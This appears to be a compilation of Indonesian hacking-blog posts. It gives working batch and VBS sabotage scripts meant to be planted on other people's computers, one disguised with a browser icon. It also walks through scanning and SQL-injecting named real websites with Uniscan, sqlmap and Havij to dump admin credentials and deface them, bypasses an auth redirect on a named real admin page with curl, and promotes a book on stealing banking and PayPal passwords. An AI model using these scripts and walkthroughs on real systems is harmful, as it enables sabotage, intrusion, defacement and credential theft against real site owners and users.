Kumpulan Trik Hacking Komputer Sederhana Mematikan

Kumpulan Trik Hacking Komputer Sederhana Mematikan

trik  

ANONIMCYBER | Hallo sob seperti judul posting ini kita Langsung saja sob, Sambil ngopi ngopi kek hehe santai sadja.

1. Membuat Forced Shoutdown

Script:

@echo off
msg * I don't like you
shutdown -c "Error! You are too ******!" -s

simpan kode script yang berwarna Merah di Notepad dengan nama : hacking.BAT type file : All file
 sebarkan File tersebut di Komputer teman Anda,
 maka Komputer korban akan otomatis FORCED SHOUTDOWN 

2. Membuat Tombol Caps Lock menyala terus-menerus

Script:

Set wshShell =wscript.CreateObject("WScript.Shell")
 do
 wscript.sleep 100
 wshshell.sendkeys "{CAPSLOCK}"
 loop 

seperti cara yang pertama, hanya berbeda kode script simpan kode yang berwarna biru di Notepad dengan nama : hacking.VBS type File : All File
sebarkan File berikut di Komputer korban maka, Tombol CAPSLOCK akan menyala terus-menerus
(bila dimatikan akan menyala lagi)

3. Membuat Pesan Jail mucul terus

Script: 

@ECHO off
:Begin
msg * muka kamu sangat jelek
msg * ngaca dulu gih, 
msg * hayo lo,cpu lu gw acak acak
msg * udah install ulang aja
msg * biar masalah nya kelar
GOTO BEGIN

simpan kode script yang berwarna hijau dengan nama hacking.BAT type file : All File
Cara ini sangat simple Jail, walaupun di close tab pesan ini masih muncul, kata katanya bisa diubah sesuai selera.
NB: Kamu bisa mengganti tulisan yang setelah tanda * itu dengan sesuka kamu

4.Membuat Komputer Hang dengan Kode script Notepad

Script:

start
start
start
start
start
start
start
start
start
start
start
start

simpan di Notepad dengan nama : hacking.BAT
terus buat shortcut palsu terserah mau shortcut apa, aku saranin shortcutnya browser mozilla terus taro aja di desktop target
( efeknya akan membuka CDM yang banyak banget sampe layarnya keluar keluar )

5.   Cara Merusak Komputer teman(Hacking Jail)

Caranya:

buka cmd(comand prompt), kalo belum tahu nyari dimana , klik start-run-ketik CMD-Lalu ketikan script ini

ASSOC.exe=.hank

lalu enter!!!

Maka program Seperti Ms.word/game-game akan ngambek untuk di jalan kan!

Setelah Puas !
Cara Mengembalikan seperti semula:
buka CMD lagi. lalu ketik 

 ASSOC.exe=EXEFILE

6.Membuat Tombol Caps Lock menyala terus-menerus

Script:

 Set wshShell =wscript.CreateObject("WScript.Shell")
 do
 wscript.sleep 100
 wshshell.sendkeys "{CAPSLOCK}"
 loop

 Simpan script pada Notepad dengan nama : hacking.VBS type File : All File

7.Jail dengan Membuka Tutup CD/DVD room

Script: 

Set oWMP = CreateObject("WMPlayer.OCX.7")
 Set colCDROMs = oWMP.cdromCollection
 do
 if colCDROMs.Count >= 1 then
 For i = 0 to colCDROMs.Count - 1
 colCDROMs.Item(i).Eject
 Next
 For i = 0 to colCDROMs.Count - 1
 colCDROMs.Item(i).Eject
 Next
 End If
 wscript.sleep 5000
 loop

Simpan script NOTEPAD tadi dengan nama : hacking.vbs type file : All

8.Cara Membuat Pesan ' Komputer Anda Butut Sekali'

Script :

Set wshShell = wscript.CreateObject("WScript.Shell")
 do
 wscript.sleep 100
 wshshell.sendkeys "Komputer Anda Butut Sekali"
 loop

simpan script dengan nama : hacking.vbs Ttpe file:All files

9.Hacking paling jahat dan membuat jangtung DEBUAR-DEBUAR

Script: 

@echo off
msg * Perkenal kan, saya adalah trojan virus!!!!! Setelah 1 menit Komputer anda akan error dan harus di re-instal !!!! TO REMOVE THE VIRUS CLICK OK OR CLOSE THIS BOX!
PAUSE
shutdown -r -t 300 -c � SORRY!!! YOUR Computer is being #ERROR GOD BYE ���..�

simpan script dengan nama(terserah anda) .
contoh:
 Nama: Mozila.bat
Type file : All files

 Setelah itu, ganti icon nya sesuai dengan icon mozila firefox untuk mengelabui si korban 

Selamat mencoba.

source: http://ganiazmedia.blogspot.co.id/

Cara Mudah Mencari Celah Kelemahan Website Dengan Uniscan Di Kali Linux

Cara Mudah Mencari Celah Kelemahan Website Dengan Uniscan Di Kali Linux

website  

ANONIMCYBER | Haloo sobat apa kabar! disini saya akan membahas langkah langkah Cara Mudah Mencari Celah Kelemahan Website Dengan Uniscan Di Kali Linux pastinya sobat hacking atau cracking butuh mencari kelemahan suatu website kan? tenang saja saya akan membahasnya. simaklah pembahasan langkah langkah berikut yah sob.

Uniscan adalah scanner kerentanan untuk aplikasi web yang ditulis dalam bahasa pemrograman perlu dengan uniscan kita bisa mencari informasi tentang apakah sebuat situs mempunyai celah seperti xss,sqli,rfi/lfi.uniscan ini sudah tersedia di kali linux, jadi kita tidak perlu install lagi sob.

Oke Sob, Kita Lanjut langsung saja ke langkah-langkahnya

Cara Muda Mencari Celah Kelemahan Website Dengan Uniscan Di Kali Linux :
1. Buka terminal anda dan ketikan perintah

uniscan -h yaitu untuk melihat option yang ingin kita gunakan

2. Memulai scaning dengan perintah & tunggu scaning hingga selesai

uniscan -u www.target.com -qweds

CONTOH :

uniscan -u www.melbournefineart.com.au -qweds

3. Wow kita bisa lihat disini ternyata website tersebut vuln terhadap sql injection

Dan bisa kita tusbol menggunakan sqlmap pada kali linux

Scaning telah selesai

Sekian langkah langkah ini, gimana sob cukup mudahkan? Nah saya ingatkan nih untuk sobat, sobat harus ada tujuan tertentu jangan ada tujuan negative yahh. jika ada yang ditanyakan sobat bisa berkomentar dibawah. Trimkasih. 

Jangan lupa share yah dan sampai jumpa sob.

10 Istilah Yang Wajib Kamu ketahui Dalam Dunia Hacking

10 Istilah Yang Wajib Kamu ketahui Dalam Dunia Hacking

istilah  

ANONIMCYBER | Selamat pagi para pembaca! hari ini saya akan membahas 10 Istilah Yang Wajib Kamu ketahui Dalam Dunia Hacking Tapi saya akan membahasnya Dalam Tempo Yang Sesingkat-singkatnya hehe alias sangat singkat tapi berbobot.

Hacking adalah suatu usaha/kegiatan untuk memasuki sebuah jaringan komputer dengan tujuan mencari kelemahan atau celah dari sistem jaringan tersebut secara ilegal dan mengeksplorasinya. Sedangkan orang yang melakukan aktivitas Hacking disebut dengan Hacker.

Untuk Menjadi seorang hacker tidaklah mudah, sangat diperlukan ketekunan, kesabaran dan usaha keras yang kuat. jika sobat ingin belajar mempelajari tentang hacking, sobat harus mengenal dan mengetahui istilah istilahnya agar sobat tidak bingung ketika ada istilah asing atau belum sobat kenal.

Berikut 10 Istilah Dalam Dunia Hacking

1. Bug
Bug adalah kesalahan pada pemograman yang menyebabkan sistem dapat diekploitasi atau error dengan kondisi tertentu. Dalam web Hacking terdapat beberapa bug seperti, RFI,LFI,SQLI,RCE,XSS dan sebagainya.

2. SQL Injection, DDos dan Deface

SQL Injection adalah suatu jenis penyerangan yang mengijinkan user peyerang untuk mengakses database server. 

Sedangkan DDos adalah teknik yang membuat sistem crash karena overload sehingga tidak akan bisa diakses atau bahkan bisa untuk mematikan service.
Deface adalah teknik yang sering digunakan oleh Hacker, yang nantinya Hacker dapat mengubah tampilan dari suatu website secara paksa dan ilegal.

3. Phising dan Debug
Phising adalah tindakan memperoleh informasi pribadi seperti ID user, password, PIN, nomer rekening bank, kartu kredit secara ilegal.
Debug adalah sebuah kegiatan mencari Bug (Kesalahan pemograman) dan setelah menemukannya, maka akan memperbaiki bug yang sudah ditemukan tadi. Atau lebih singkatnya Debug adalah proses menemukan dan memperbaiki Bug.

4. Fake Login, Fake Process dan Keylogger
Fake Login ini sebuah halaman tiruan/ palsu yang sengaja dibuat untuk mengelabui user dengan tujuan untuk mendapatkan informasi-informasi penting dari user.
Fake Process sebuah Proses tiruan yang dibuat untuk menyembunyikan nama proses asli, yang bertujuan untuk mengelabui admin sistem.
Sedangkan KeyLogger adalah sebuah software yang dipasang di komputer agar dapat mencatat semua aktivitas yang terjadi pada keyboard secara diam-diam dan tidak kasat mata sehingga pengguna tidak menyadarinya.

5. Virus, Worm, dan Trojan
Virus adalah sebuah kode jahat yang mempunyai sistem kerja sama dengan virus yang menyerang pada manusia, virus ini dapat menggandakan diri dan seperti halnya parasit yang hidup pada file yang diinfeksinya. Jika file terkena virus, File yang terinfeksi bisa rusak atau ukuran file tersebut akan bertambah besar.
Worm adalah kode jahat yang sistem kerjanya sama seperti cacing, menggandakan diri lalu menyebar dengan cepat.
Sama halnya kuda Trojan yang ada pada Zaman Romawi, Trojan akan masuk kedalam sistem untuk mengintip dan mencuri informasi penting yang ada didalamnya kemudian data yang berhasil dicuri akan dikirimkan kepada si pemilik trojan tersebut.

6. Backdoor
Backdoor atau pintu belakang adalah yang dipasangkan di komputer yang menjadi sasaran, kemudian sistem yang berhasil dimasukinya akan diekploitasi oleh si penyerang. Dengan menggunakan Backdoor, sang attacker bisa masuk ke komputer korban kapan saja meskipun tidak ada sentuhan fisik sekalipun.

7. Black Hat dan White Hat
Black Hat adalah sebuah kelompok hacker dengan kemampuan mencuri data atau menghambar sistem yang ada pada komputer korban. Black Hat di kenal dengan kemampuannya untuk menghilangkan jejak sampai tidak mampu dilacak.
Jika ada jahat pasti ada yang baik, begitu pula dalam dunia Hacker jika Black Hat lebih cenderung untuk merusak dan mencuri, ada juga White Hat yang cenderung lebih memanfaatkan pengetahuan yang mereka miliki untuk memuaskan rasa ingin tahu mereka.

8. Script KiddieSebuah pola serangan yang sering kali digunakan oleh Hacker pemula menggunakan indera bantu ringan yang bisa didapatkan dibanyak situs-situs Hacker lainnya. Script ini hanya berisi Scipt sederhana yang nantinya akan dipakai untuk mendeface atau melancarkan DOS pada korbannya.

9. Buffer Overflow

Merupakan sebuah kelemahan yang praktis yang bisa ditemukan dan dimanfaatkan oleh sang Hacker dalam sebuah sistem. Jika Sistem Operasi atau program tidak dikode secara sempurna maka Hacker bisa membuat komputer korban menjadi terganggu dengan mengirimkan perintah-perintah yang akan membuat gangguan berlangsung lebih lama.

10. ExploitExploit 

Artinya keberadaan sebuah celah keamanan dalam perangkat lunak yang berjalan pada sebuah komputer. Lewat Exploit ini juga serangan hacker akan terbuka lebar, setiap aplikasi atau sistem operasi baru bermunculan maka genderang perang di tabuh buat para hacker untuk memulai mencari kelemahannya.

Itulah 10 Istilah Yang Wajib Kamu Ketahui Dalam Dunia Hacking, Nah saran saya kalo sobat ingin hapal dan tahu arti ini semuanya, sobat harus mempraktekannya ketika sobat belajar hacking.

Sekian artikel ini, Semoga bermanfaat dan sampai jumpa. Jangan Lupa Share yah

Download Buku Sakti Hacker Full PDF 100%

Download Buku Sakti Hacker Full PDF 100%

hacking  

ANONIMCYBER | Hallo sobat kali ini saya akan membagikan BUKU SAKTI HACKER buku ini memang jarang orang lain atau toko toko buku yang saat ini menjualnya. jadi saya akan baik hati membagikan buku ini dalam format .PDF Oke langsung saja download dibawah

Cover Buku Sakti Hacker

Properti Ebook :

• Judul Ebook : Buku Sakti Hacker
• Penerbit : mediakita
• Penulis :EFVY ZAM
• Jumlah halaman : 357

Fitur Buku :

1. Menemukan Username dan Password sebuah situs
2. Menemukan Username dan Password akun Facebook
3. Menemukan Username dan Password Internet Banking
4. Menemukan Username dan Password akun Paypal
5. Membuat dan Mengirim Spyware dan masih banyak lagi

Buku Sakti Hacker | DOWNLOAD

Sampai Jumpa sob!

Deteksi Celah NO REDIRECT Pada Suatu Situs Menggunakan CURL

Deteksi Celah NO REDIRECT Pada Suatu Situs Menggunakan CURL

write up  

Halo selamat malam, kali ini saya akan memberikan sedikit tutorial bagaimana menemukan sebuah celah/vulnerability NO REDIRECT pada suatu situs. Celah ini ditemukan pada suatu halaman/file yang seharusnya dapat diakses hanya pada user yang memiliki akses tertentu (user yang sudah login).

Contohnya pada suatu kasus untuk dapat masuk ke halaman dashboard admin yang terdapat pada file /admin/home.php, kita diharuskan login terlebih dahulu. Maka dari itu, biasanya kita akan di redirect/arahkan ke halaman login dahulu, misalkan di file /admin/login.php


Sudah paham maksudnya?
Jika masih belum paham, mari simak penjelasan berikut.


Saya menemukan suatu sample situs yang memiliki celah ini, coba kalian kunjungi situs berikut:
http://shmsupport.telkomspeedy.com/admin/ maka kalian akan di arahkan/redirect ke halaman situs tersebut yang beralamat pada http://shmsupport.telkomspeedy.com/admin/login.php?MSG=NOSESSION

Dapat Simpulkan, bahwa pada folder /admin/ terdapat sebuah file index.php yang mem-validasi bahwa hanya user yang sudah LOGIN saja yang dapat mengakses ini. Simplenya, $_SESSION user sudah ter-set.

 Sayangnya, ada cara bagaimana mengakses /admin/ tanpa harus login terlebih dahulu. Bypassing dengan Query SQL??? 

***Bukan jawaban yang tepat pada pembahasan kali ini***

Lalu bagaimana?

*Cukup gunakan command CURL pada console/terminal/CMD, lalu jalankan command berikut:

$ curl -v http://shmsupport.telkomspeedy.com/admin/

Akan muncul sebuah hasil, dimana di perlihatkan bahwa kita dapat melihat isi dari halaman dashboard admin tersebut.

Melihat tulisan LOGOUT bukan? Padahal kita tidak login sama sekali ke website tersebut. Yap, ini merupakan sebuah bug. Melalui console seperti memang akan terbatas untuk melakukan hal-hal lainnya, tapi anda bisa menggunakan sebuah addons pada Browser untuk melakukan ini yaitu NO REDIRECT (https://addons.mozilla.org/en-US/firefox/addon/noredirect/).

*******************************
Kenapa ini bisa terjadi?
Jika kita pernah coding hal seperti ini, kita akan membuat sebuah validasi $_SESSION, untuk memastikan apakah user yang mengakses halaman tersebut sudah login atau belum. Biasanya akan di coding seperti ini:

if(!isset($_SESSION[user])) {
             // lakukan redirect disini jika user belum login
}

Tapi codingan diatas masih memiliki bug, memang jika kita mengaksesnya melalui browser kita akan di arahkan ke halaman yang akan di set di codingan tersebut, namun jika kita melihat melalui CURL tadi, halamannya akan bisa kita lihat.

*******************************
Lalu bagaimana memperbaiki bug ini? dan apakah ini fatal?

Untuk memperbaiki ini simple saja, tambahkan die() ataupun exit() setelah bagian Lakukan Redirect.

if(!isset($_SESSION[user])) {
              // lakukan redirect disini jika user belum login
              exit();
}

Codingan diatas akan langsung menutup tadi jika kita mengakses melalui CURL, dan potongan code dashboard admin tadi tidak akan bisa dilihat lagi.

Jika terdapat informasi yang sensitif seperti dokument pribadi/dokument user/customer/client atau hal lainnya yang terdapat pada halaman tersebut, akan sangat mudah sekali didapatkan karena mereka masuk/melihat tanpa harus melalui sebuah authentikasi yang valid. Hal ini juga bisa menjadi awal terjadinya Exploitasi dengan CSRF, dan lainnya.



Oke sekian dulu tutorial kali ini, semoga bermanfaat.

Cara Deface Menggunakan Havij Pro 1.17

Cara Deface Menggunakan Havij Pro 1.17

hacking  

ANONIMCYBER | Hallo sobat, hari ini saya akan mengajari sobat deface menggunakan "havij pro 1.17" versinya sudah pro jadi sobat tinggal download dan pake, okeyy kita mulai saja.

Apa yang kamu butuhkan

• Havij Pro 1.17 DOWNLOAD
• Koneksi Internet
• Yang paling penting "Target"

Setelah download, kita harus cari target dulu, contoh target yang saya targetkan ini adalah http://www.boboho.com/interior-articles.php?id=5 dan situs yang saya akan hack adalah boboho.com

Klik Analyze yang ada disamping link target

Jika sudah dapet Databasenya "boboho.com" sekarang kita klik tombol Tables > klik Get Tables nanti akan ada seperti ini

Pilih wp_users dan klik tombol Get Columns. dan akan keluar sub database seperti ini :

Nah, Sekarang kita udah dapet Password sama Usernamenya Admin. sekarang Cari URL Adminnya pakai Admin Finder.

Sekarang Tinggal Masukin ID sama Password di URL Admin dan Ganti index.php dengan index Deface sobat. Selesai dah success!.

DOWNLOAD | HAVIJ PRO 1.17

Jangan Lupa share yah sob! Sampai jumpa!